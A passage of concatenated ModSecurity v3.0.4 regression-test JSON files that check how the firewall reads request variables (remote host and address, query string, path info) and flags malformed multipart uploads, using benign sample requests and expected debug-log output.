"User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"123\" \\(Variable: REMOTE_PORT\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_PORT \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REMOTE_HOST.json0000644000175000017500000000373713607066010026236 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_HOST", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.11", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"200.249.12.31\" \\(Variable: REMOTE_HOST\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_HOST \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_HOST", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"::1", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"200.249.12.31\" \\(Variable: REMOTE_HOST\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_HOST \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-REMOTE_ADDR.json0000644000175000017500000000372513607066010026170 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_ADDR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"200.249.12.31\" \\(Variable: REMOTE_ADDR\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: REMOTE_ADDR", "client":{ "ip":"::1", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"::1\" \\(Variable: REMOTE_ADDR\\)" }, "rules":[ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-QUERY_STRING.json0000644000175000017500000000200013607066010026357 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: QUERY_STRING", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key1=value1&key2=v%20a%20l%20u%20e%202", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"key2=v\\%20a\\%20l\\%20u\\%20e\\%202\" \\(Variable: QUERY_STRING\\)" }, "rules":[ "SecRuleEngine On", "SecRule QUERY_STRING \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-PATH_INFO.json0000644000175000017500000000610113607066010025741 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: PATH_INFO (1/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three", "method":"POST", "body":[ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"/one/two/three\" \\(Variable: PATH_INFO\\)" }, "rules":[ "SecRuleEngine On", "SecRule PATH_INFO \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: PATH_INFO (2/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/three?key=value", "method":"POST", "body":[ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"/one/two/three\" \\(Variable: PATH_INFO\\)" }, "rules":[ "SecRuleEngine On", "SecRule PATH_INFO \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: PATH_INFO (3/3)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"27", "Content-Type":"application/x-www-form-urlencoded" }, "uri":"/one/two/%20/three?key=value", "method":"POST", "body":[ "param1=value1¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"/one/two/ /three\" \\(Variable: PATH_INFO\\)" }, "rules":[ "SecRuleEngine On", "SecRule PATH_INFO \"@contains test \" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-OUTBOUND_DATA_ERROR.json0000644000175000017500000000660413607066010027403 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: OUTBOUND_DATA_ERROR (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*" }, "uri":"/?key=value&key=other_value", "method":"GET" }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: OUTBOUND_DATA_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule OUTBOUND_DATA_ERROR \"@eq 1\" \"id:1,phase:4,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: OUTBOUND_DATA_ERROR (2/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: OUTBOUND_DATA_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecResponseBodyAccess On", "SecResponseBodyLimit 2", "SecRule OUTBOUND_DATA_ERROR \"@eq 1\" \"id:1,phase:4,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json0000644000175000017500000000335713607066010030660 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_UNMATCHED_BOUNDARY", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"1\" \\(Variable: MULTIPART_UNMATCHED_BOUNDARY\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@contains small_text_file.txt\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json0000644000175000017500000002361013607066010030020 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_STRICT_ERROR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary= --------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Multipart: Warning: boundary whitespace in C-T header" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_STRICT_ERROR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=\"--------------------------756b6d74fa1a8ee2\"", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Multipart: Warning: boundary was quoted." }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_STRICT_ERROR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--whee." ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Multipart: Warning: seen data before first boundary" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_STRICT_ERROR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Warning: incorrect line endings used \\(LF\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_STRICT_ERROR", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name='filedata'; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "--------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Multipart: Warning: seen data before first boundary" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_STRICT_ERROR - RFC2046", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?", "Content-Disposition: form-data; name=\"name\"", "", "1", "--0123456789AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz '()+_,-./:=?--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: REQBODY_ERROR\\)" }, "rules":[ "SecRuleEngine On", "SecRule REQBODY_ERROR \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MULTIPART_NAME.json0000644000175000017500000000714013607066010026557 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_FILENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_FILENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r", "Content-Type: text/plain\r", "\r", "This is another very small test file..\r", "----------------------------756b6d74fa1a8ee2--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json0000644000175000017500000000362713607066010031305 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_INVALID_HEADER_FOLDING", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------69343412719991675451336310646", "Content-Disposition: form-data;", " name=\"a\"", "", "1", "-------------------------------69343412719991675451336310646", "Content-Disposition: form-data;", " name=\"b\"", "", "2", "-------------------------------69343412719991675451336310646--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"ARGS:a" }, "rules":[ "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"", "SecRule ARGS \"@eq 1\" \"phase:2,deny,status:403,id:5000277\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MULTIPART_FILENAME.json0000644000175000017500000000720513607066010027221 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_FILENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: MULTIPART_FILENAME", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r", "Content-Type: text/plain\r", "\r", "This is another very small test file..\r", "----------------------------756b6d74fa1a8ee2--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json0000644000175000017500000000715513607066010030106 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Variables :: FILES (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", "test", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is a very small test file..", "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", "Content-Type: text/plain", "", "This is another very small test file..", "----------------------------756b6d74fa1a8ee2--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Target value: \"0\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing Variables :: FILES (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 